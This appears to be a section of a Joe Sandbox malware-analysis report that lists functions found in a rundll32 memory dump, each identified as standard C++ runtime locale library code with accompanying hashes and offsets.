std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A28AD

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A28D2
messages.LIBCPMT ref: 000001E5190A2955
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A296C
_CxxThrowException.LIBCMT ref: 000001E5190A297D
std::_Facet_Register.LIBCPMT ref: 000001E5190A299B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID:
API String ID: 620047600-0
Opcode ID: 915cf86895ac07d937b62642654921994e7e6139a02f3fdf34537d2804a32b4b
Instruction ID: 09f342d1025f4b51031b0e81266363f2d27e24c27b024265c0763a0999239265
Opcode Fuzzy Hash: 915cf86895ac07d937b62642654921994e7e6139a02f3fdf34537d2804a32b4b
Instruction Fuzzy Hash: 5D41B431119E694FE754EF1DD494BEE73F2FBA4314F54066EA44AC31A6CA30D905CB82

Function 000001E5190A30DC Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A30FD

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3122
moneypunct.LIBCPMT ref: 000001E5190A31A5
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A31BC
_CxxThrowException.LIBCMT ref: 000001E5190A31CD
std::_Facet_Register.LIBCPMT ref: 000001E5190A31EB

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
String ID:
API String ID: 3809448442-0
Opcode ID: 77321c750d283a068eef52474f1328485b1adbfdf4c2edc2983fef81da2ed23e
Instruction ID: 592f75c0b0be54c92fc3dfa7075de67d989f6adf6db285cff11db8a69665e6a8
Opcode Fuzzy Hash: 77321c750d283a068eef52474f1328485b1adbfdf4c2edc2983fef81da2ed23e
Instruction Fuzzy Hash: 6641A231209E494FE754EB28D495BEE73F2FBA4314F58066EA40AC31A6DA70D805CB82

Function 000001E5190A392C Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A394D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3972
numpunct.LIBCPMT ref: 000001E5190A39F5
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A3A0C
_CxxThrowException.LIBCMT ref: 000001E5190A3A1D
std::_Facet_Register.LIBCPMT ref: 000001E5190A3A3B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
String ID:
API String ID: 4068408745-0
Opcode ID: 441b8e41e1d8b8a705fa5094bdd223caa96ea1b284aea36a97238e43f629e6f4
Instruction ID: d363977ec4ddbed90e47318af70bcdc2fc981915c80e44ee6359429abb956b75
Opcode Fuzzy Hash: 441b8e41e1d8b8a705fa5094bdd223caa96ea1b284aea36a97238e43f629e6f4
Instruction Fuzzy Hash: DE41C331619E594FE754EB19D484BEE73F2FBA8314F14066EA40AC31A2CA70D805CB82

Function 000001E5190A275C Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A277D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A27A2
ctype.LIBCPMT ref: 000001E5190A2825
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A283C
_CxxThrowException.LIBCMT ref: 000001E5190A284D
std::_Facet_Register.LIBCPMT ref: 000001E5190A286B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockctypestd::bad_exception::bad_exception
String ID:
API String ID: 3320480354-0
Opcode ID: 399c9e31cdefa6e34355b3389e5769c9eacfa5db4b9d05f97f7b15c89971f269
Instruction ID: 977af521501a41c71b0adafeff386a7f977d5509a000f8e97db1563da1ad2476
Opcode Fuzzy Hash: 399c9e31cdefa6e34355b3389e5769c9eacfa5db4b9d05f97f7b15c89971f269
Instruction Fuzzy Hash: BE41A231109E598FE755EB28D494BEE73F2FB68314F54066EA81AC31A6DA30DC45CBC2

Function 000001E5190B7FA0 Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190B7FC1

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190B7FE6
moneypunct.LIBCPMT ref: 000001E5190B8069
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190B8080
_CxxThrowException.LIBCMT ref: 000001E5190B8091
std::_Facet_Register.LIBCPMT ref: 000001E5190B80AF

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
String ID:
API String ID: 3809448442-0
Opcode ID: f056f9edf8a4f6c957cdc38cd9e619afd480da16a60ef54abf923e9647275c7d
Instruction ID: 6ad15c7f7fda2aee9668a7263c1749f702eae16993c1d4184e64e8f8616252dd
Opcode Fuzzy Hash: f056f9edf8a4f6c957cdc38cd9e619afd480da16a60ef54abf923e9647275c7d
Instruction Fuzzy Hash: 1441A131518E484FE7A5EB18D484BEE77F2FBA8354F18056DA80AC31A6CA34DD41CB82

Function 000001E5190A2FAC Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A2FCD

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A2FF2
moneypunct.LIBCPMT ref: 000001E5190A3075
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A308C
_CxxThrowException.LIBCMT ref: 000001E5190A309D
std::_Facet_Register.LIBCPMT ref: 000001E5190A30BB

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
String ID:
API String ID: 3809448442-0
Opcode ID: 7860dc70e9bf5cc0d0039a70ddbee0ae88935c02dea494e287fd0833cf40dded
Instruction ID: 2aa8b4507cf6c087ca85fdf8606bf09243d6cd8704ddf6b0deaaa33e7503f7ac
Opcode Fuzzy Hash: 7860dc70e9bf5cc0d0039a70ddbee0ae88935c02dea494e287fd0833cf40dded
Instruction Fuzzy Hash: A6419F31209E498FE755EB18D494BEE73F2FB64314F14066EA44AC31A6CA70DC45CBC6

Function 000001E5190A37FC Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A381D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3842
messages.LIBCPMT ref: 000001E5190A38C5
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A38DC
_CxxThrowException.LIBCMT ref: 000001E5190A38ED
std::_Facet_Register.LIBCPMT ref: 000001E5190A390B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID:
API String ID: 620047600-0
Opcode ID: 5cfbe0f19a11e7d9f6b8e2c9b460ff2103601be7b6c7b550dceed3157f851894
Instruction ID: 18d43dc0612722645f3c20c874a01f28e25531598d08b895417b0382cf20a007
Opcode Fuzzy Hash: 5cfbe0f19a11e7d9f6b8e2c9b460ff2103601be7b6c7b550dceed3157f851894
Instruction Fuzzy Hash: 93418231619F494FE754EF18D484BEE73F2FBA4324F54066EA45AC31A5CA70D905CB82

Function 000001E5190A3A5C Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3A7D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3AA2
numpunct.LIBCPMT ref: 000001E5190A3B25
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A3B3C
_CxxThrowException.LIBCMT ref: 000001E5190A3B4D
std::_Facet_Register.LIBCPMT ref: 000001E5190A3B6B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
String ID:
API String ID: 4068408745-0
Opcode ID: 7040e9f09c21cb0afca421e897f27dcdacf665d9cacd4426a9b98b6e033285e0
Instruction ID: e63027fbddd269f0b6d3a9b2e186b934f83d8cf303840885a3794e435677aeea
Opcode Fuzzy Hash: 7040e9f09c21cb0afca421e897f27dcdacf665d9cacd4426a9b98b6e033285e0
Instruction Fuzzy Hash: 4F41B231119E594FE764EB28D494BEE73F3FBA4314F58066EA50AC31A6DA70D805CBC2

Function 000001E51909C2AC Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51909C2CD

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51909C2F2
numpunct.LIBCPMT ref: 000001E51909C375
std::bad_exception::bad_exception.LIBCMT ref: 000001E51909C38C
_CxxThrowException.LIBCMT ref: 000001E51909C39D
std::_Facet_Register.LIBCPMT ref: 000001E51909C3BB

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
String ID:
API String ID: 4068408745-0
Opcode ID: d3f43ab89e984d6a3700269965d375e20708ad9f940fdae27254e6f2a65f332c
Instruction ID: 946b0a4a0a977bcca585ea4b0089e505c28fef6f0ac0de86b7f2087c3e6a2c73
Opcode Fuzzy Hash: d3f43ab89e984d6a3700269965d375e20708ad9f940fdae27254e6f2a65f332c
Instruction Fuzzy Hash: 4041E731908E998FE754EF18D4957EE73F2FB54314F58456EA44EC31A6CA30D805D781

Function 000001E5190B7AE0 Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190B7B01

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190B7B26
messages.LIBCPMT ref: 000001E5190B7BA9
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190B7BC0
_CxxThrowException.LIBCMT ref: 000001E5190B7BD1
std::_Facet_Register.LIBCPMT ref: 000001E5190B7BEF

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID:
API String ID: 620047600-0
Opcode ID: 6f298ffa6e497c2eaaf01785e43fc4dce3c4a55519c401323b13ede0ce761a3d
Instruction ID: ca436bbc7e54c2c48ff6c893bbf9a177f94015634aad9fbb802c64ec8f7e6b6a
Opcode Fuzzy Hash: 6f298ffa6e497c2eaaf01785e43fc4dce3c4a55519c401323b13ede0ce761a3d
Instruction Fuzzy Hash: 1E41B331508E498FE764EB28D490BED73F3FBA8314F58056EA51AD31A6CA34DC42CB81

Function 000001E5190A2AEC Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A2B0D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A2B32
messages.LIBCPMT ref: 000001E5190A2BB5
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A2BCC
_CxxThrowException.LIBCMT ref: 000001E5190A2BDD
std::_Facet_Register.LIBCPMT ref: 000001E5190A2BFB

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID:
API String ID: 620047600-0
Opcode ID: 14be1b1fd9718fc3f34adfb3cbca17648e58064d730dfa3a608ea707c9c1eaf3
Instruction ID: be0a820e104ba65090ad5cd58c749c44eee1b4c1d61c46de1493515ac47737c3
Opcode Fuzzy Hash: 14be1b1fd9718fc3f34adfb3cbca17648e58064d730dfa3a608ea707c9c1eaf3
Instruction Fuzzy Hash: 37418131119E598FE764EF18D4847EE73F3FBA8314F54056EA91AC31A6CA60D845CB81

Function 000001E5190A333C Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A335D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3382
moneypunct.LIBCPMT ref: 000001E5190A3405
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A341C
_CxxThrowException.LIBCMT ref: 000001E5190A342D
std::_Facet_Register.LIBCPMT ref: 000001E5190A344B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
String ID:
API String ID: 3809448442-0
Opcode ID: e16598f94629519630b94ae800744cf899b351421400b9fa78f81e17fa1edaa5
Instruction ID: 6f037507b100abad3063706fdd5945951d59897e4091374a02e3a57a61df43d3
Opcode Fuzzy Hash: e16598f94629519630b94ae800744cf899b351421400b9fa78f81e17fa1edaa5
Instruction Fuzzy Hash: C841913160DE494FEB55EB18D494BEE73F2FB54314F58056EA44AC31A5DE60D805CBC2

Function 000001E51909C17C Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51909C19D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51909C1C2
messages.LIBCPMT ref: 000001E51909C245
std::bad_exception::bad_exception.LIBCMT ref: 000001E51909C25C
_CxxThrowException.LIBCMT ref: 000001E51909C26D
std::_Facet_Register.LIBCPMT ref: 000001E51909C28B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID:
API String ID: 620047600-0
Opcode ID: 41d49ad4b7121165f543fc67f64dc3071c0984782cb30c3a214f00ddd9751a84
Instruction ID: 46a3531e6b1a3d8861fcd1f5d581f8b6790babd0df8e285efca43780efd21a25
Opcode Fuzzy Hash: 41d49ad4b7121165f543fc67f64dc3071c0984782cb30c3a214f00ddd9751a84
Instruction Fuzzy Hash: 5E41B231918E598FE754EB68D494BEE73F2FB65314F58066EA85EC32A2CE30D805C781

Function 000001E5190B79B0 Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190B79D1

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190B79F6
collate.LIBCPMT ref: 000001E5190B7A79
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190B7A90
_CxxThrowException.LIBCMT ref: 000001E5190B7AA1
std::_Facet_Register.LIBCPMT ref: 000001E5190B7ABF

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockcollatestd::bad_exception::bad_exception
String ID:
API String ID: 3240839640-0
Opcode ID: b689417173be9a58d7525dd7f69df29017bd0b297875d8cf91ba4b2357bb2b2e
Instruction ID: f3c94278e0b1481a0ec315bb57e23e730df8708eb3fa32664a3a4e3a40da9714
Opcode Fuzzy Hash: b689417173be9a58d7525dd7f69df29017bd0b297875d8cf91ba4b2357bb2b2e
Instruction Fuzzy Hash: CA41B331508E484FE795EB28D484BEE73F2FB94314F1C056EA40AD32A6CA34DA45C781

Function 000001E5190A29BC Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A29DD

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A2A02
messages.LIBCPMT ref: 000001E5190A2A85
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A2A9C
_CxxThrowException.LIBCMT ref: 000001E5190A2AAD
std::_Facet_Register.LIBCPMT ref: 000001E5190A2ACB

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID:
API String ID: 620047600-0
Opcode ID: d9cb5c1c6ae06c0d428bbbd94a39445ef9bd2be3a68fcd0c49b05d0f5fcf55f6
Instruction ID: 902648a6b2b9555253df24a5145f36998c18f8d63f40715979818437160aac24
Opcode Fuzzy Hash: d9cb5c1c6ae06c0d428bbbd94a39445ef9bd2be3a68fcd0c49b05d0f5fcf55f6
Instruction Fuzzy Hash: C741A631109E598FE764EB18D494BEE73F2FB64314F58056EA40AC31A6CA30D945C7C1

Function 000001E5190A320C Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A322D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3252
moneypunct.LIBCPMT ref: 000001E5190A32D5
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A32EC
_CxxThrowException.LIBCMT ref: 000001E5190A32FD
std::_Facet_Register.LIBCPMT ref: 000001E5190A331B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
String ID:
API String ID: 3809448442-0
Opcode ID: f8b94c656457c1187a9d8cbcd32f96ed1970e85c5a83aee131887960ce47540c
Instruction ID: 94ee7cf4729a45c3de63f3c5ca9a2419a4916238904c70e58a206f2f37712925
Opcode Fuzzy Hash: f8b94c656457c1187a9d8cbcd32f96ed1970e85c5a83aee131887960ce47540c
Instruction Fuzzy Hash: 4141A431619E498FE754EF68D494BEE73F2FBA4314F54066EA44AC31A2DA70DC05C782

Function 000001E5190A346C Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A348D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A34B2
messages.LIBCPMT ref: 000001E5190A3535
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A354C
_CxxThrowException.LIBCMT ref: 000001E5190A355D
std::_Facet_Register.LIBCPMT ref: 000001E5190A357B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID:
API String ID: 620047600-0
Opcode ID: 244ef1690acba6a5cb0dd3559b1bc5566f4c94bd989e195887cab2b3b6a165ed
Instruction ID: f4d91ef57a4bc46361448021cc9250e5873930c20132cd1e9fb0c72f853e610d
Opcode Fuzzy Hash: 244ef1690acba6a5cb0dd3559b1bc5566f4c94bd989e195887cab2b3b6a165ed
Instruction Fuzzy Hash: 0A41C53160DE494FEB55EB68D494BEE73F2FB64314F58066EA41AC31A1CA70D805CBC2

Function 000001E5190A24FC Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A251D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A2542
collate.LIBCPMT ref: 000001E5190A25C5
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A25DC
_CxxThrowException.LIBCMT ref: 000001E5190A25ED
std::_Facet_Register.LIBCPMT ref: 000001E5190A260B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockcollatestd::bad_exception::bad_exception
String ID:
API String ID: 3240839640-0
Opcode ID: 76c8dbfefe16807c6c2e03d2c02e8fce80c7731968c8574b3a75b952f183e87e
Instruction ID: 03aec1e7ff4d2f84ff3304abe071c005cd8da84975f851239f761aca74a50f51
Opcode Fuzzy Hash: 76c8dbfefe16807c6c2e03d2c02e8fce80c7731968c8574b3a75b952f183e87e
Instruction Fuzzy Hash: 0041A43111DE584FE754EB28D895BEE73F2FB64314F54067EA85AC31A6CA30D805CB82

Function 000001E5190B7D40 Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190B7D61

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190B7D86
messages.LIBCPMT ref: 000001E5190B7E09
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190B7E20
_CxxThrowException.LIBCMT ref: 000001E5190B7E31
std::_Facet_Register.LIBCPMT ref: 000001E5190B7E4F

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID:
API String ID: 620047600-0
Opcode ID: 3d9e32fe7dd0b0532a8a56be85dacd11b9ba7591c2a82d48e1cf92cf00c2def1
Instruction ID: d419f612ec0254dd06e485d4fd0c6a8e658b15194ec5d1096d58f0e0c08c6917
Opcode Fuzzy Hash: 3d9e32fe7dd0b0532a8a56be85dacd11b9ba7591c2a82d48e1cf92cf00c2def1
Instruction Fuzzy Hash: 68416F31518E488FE755EB28D4C4BAE73F2FBA8314F58066DE45AD32A6CA34EC45C781

Function 000001E5190A23CC Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A23ED

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A2412
codecvt.LIBCPMT ref: 000001E5190A2495
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A24AC
_CxxThrowException.LIBCMT ref: 000001E5190A24BD
std::_Facet_Register.LIBCPMT ref: 000001E5190A24DB

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockcodecvtstd::bad_exception::bad_exception
String ID:
API String ID: 2666907392-0
Opcode ID: 786228c0cbaae2e5be0ca3ccd782fa5b01697f06a74618a99b9e5aa10a8d0d32
Instruction ID: 8c906c6a933b3a2865541c834f85cb97f2150286e6c4c148f918d80edcb371c5
Opcode Fuzzy Hash: 786228c0cbaae2e5be0ca3ccd782fa5b01697f06a74618a99b9e5aa10a8d0d32
Instruction Fuzzy Hash: 5C41A331109E594FE754EB18D494BDE73F2FB64314F55066EA85AC31B5CA30DC45CB82

Function 000001E5190B7C10 Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190B7C31

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190B7C56
messages.LIBCPMT ref: 000001E5190B7CD9
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190B7CF0
_CxxThrowException.LIBCMT ref: 000001E5190B7D01
std::_Facet_Register.LIBCPMT ref: 000001E5190B7D1F

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID:
API String ID: 620047600-0
Opcode ID: bc7c18e89f00e4146b619dee3e1b955b084c897949153250966cdf59237aa082
Instruction ID: b8f4c8c3f1b95cd6cd0a4eebadd57110b4b8bb0042bc89c23ac985055170f53e
Opcode Fuzzy Hash: bc7c18e89f00e4146b619dee3e1b955b084c897949153250966cdf59237aa082
Instruction Fuzzy Hash: 64419331508E484FE755EB28D4C4BEE73F2FBA8314F58066EA40BD32A6DA34D845C781

Function 000001E5190A2C1C Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

